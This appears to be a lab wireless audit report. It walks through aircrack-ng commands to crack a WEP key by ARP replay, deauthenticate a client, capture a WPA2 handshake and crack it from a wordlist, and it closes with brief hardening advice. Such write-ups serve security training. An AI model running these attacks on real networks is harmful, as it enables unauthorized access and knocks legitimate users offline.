Pwn Security Labs 

 

Wireless Security Audit Report 

anoni-linux@pwnsecuritylabs.com

Page 1

Table of Contents 

1. Table of Contents………………………………………………………...2 1.1 Contents of What’s In Scope of the Security Audit………………..3

2. Stage 1…………………………………………………………...………...4 2.1 Wireless Network Key………………………………………………...4 2.2 Screenshots……………………………………………………………4 2.3 Steps……………………………………………………………………5

3. Stage…………………………………………………………………….....9

3.1 Wireless Network Key………………………………………………...9 3.2 Screenshots…………………………………………………………...9 3.3 Steps………………………………………………………………….10

4. Recommendations for Securing Wireless Networks…………….14

Page 2

1.1 Contents of What’s Scope of the Security Audit  The following network(s) is what's in scope of the wireless security audit. ESSID: Stage-1

● BSSID: 00:C0:CA:9F:F2:76 ● Channel #: 1

ESSID: Stage-3 ● BSSID: 00:C0:CA:9F:F2:76 ● Channel #: 1

Page 3

2. Stage-1 2.1 Network Key  Target Network: Stage-1 Network Key “aabbccddee” 2.2 Screenshots

Page 4

2.3 Steps Place wireless card into monitor mode Commad:

“Airmon-ng start wlan0” Listening in on the target network “Stage-1” with airodump-ng

Command: “airodump-ng --bssid 00:C0:CA:9F:F2:76 --channel 1 --write Stage-1 wlan0mon ”

Ran an authentication attack on the target access point to associate wlan0’s mac address to the network.

Command:

“Aireplay-ng -1 60 -a 00:C0:CA:9F:F2:76 wlan0mon”

Page 5

As suspected, the fake authentication attack was successful

In another window started aireplay ARP-Replay attack against “Stage-1” to listen in on the network for an ARP packet from the client “00:0F:00:73:C6:9E” Command:

“Aireplay-ng -3 -b 00:C0:CA:9F:F2:76 -h 00:C0:CA:96:DD:2F wlan0mon” Sent deauthentication packets to the connected client “00:0F:00:73:C6:9E”.

Command:

“Aireplay-ng -0 1 -a 00:C0:CA:9F:F2:76 -c 00:0F:00:73:C6:9E ” With the ARP-Replay attack window still running, you can see we captured an ARP packet from the Network as the client “00:0F:00:73:C6:9E” authenticates to the access point, flooding the network with arp packets will force the access point to generate new IVS upon every arp packet sent from our wireless card.

Page 6

With aireplay injecting the network with arp packets airodump has captured more network traffic,

Page 7

With airodump still running we crack the network key using aircrack-ng

Command: “Aircrack-ng Stage-1-01.cap”

Page 8

3. Stage-3 3.1 Network Key  Target Network: Stage-3 Network Key “crackme12345678” 3.2 Screenshots

Page 9

3.3 Steps Place our wireless card into monitor mode Command:

“Airmon-ng start wlan0” Listening in on the target network “Stage-3” with airodump-ng

Command:

“Airodump-ng --bssid 00:C0:CA:9F:F2:76 --channel 1 --write stage-3 wlan0mon” Sent a directed deauthentication attack to connected client to force a 4-way handshake

Command:

“Aireplay-ng -0 1 -a 00:C0:CA:9F:F2:76 -c 00:0F:00:73:C6:9E wlan0mon ”

Page 10

And as suspected airodump has captured a 4-way handshake as the client “00:0F:00:73:C6:9E” re authenticates to the network.

“wpaclean” was used to clean the airodump capture file so it only contains the 4-way handshake and then we verify the handshake by using analyze command with “pyrit”.

Command:

“Pyrit -r stage-3-clean --analyze”

Page 11

We used airolib-ng to create rainbow tables to speed up the wpa2 cracking process by generating precomputed PMK’s (Pairwise Master Keys) issuing the following commands. Command:

“Airolib-ng testdb --import essid essid.txt” Command:

“Airolib-ng testdb --import passwd wordlist.txt” Command:

“Airolib-ng testdb --batch”

Page 12

Then we use aircrack to crack the wpa2 password

Command:

“Aircrack-ng -r testdb stage-3-clean”

Page 13

4. Recommendations for Securing Wireless Networks 4.1 Use WPA2 Don’t use WEP as this report shows how easily it is to crack a WEP based network. Using WPA2 encryption is much safer with a long password which will make it much harder for attackers to be able to successfully crack your WiFi password, as you were shown earlier how easy it was to gain unauthorized access even into a WPA2 network. The longer the password, the longer its going to take attackers to crack the WPA2 password, most of the time People don't change their passwords or they choose simple ones which in turns leaves them extremely vulnerable.

4.2 Use WISPS Wireless Intrusion Prevention System, is a IDS/IPS based technology for wireless networks that helps detect wireless attacks against your network with notifications in real time.

Page 14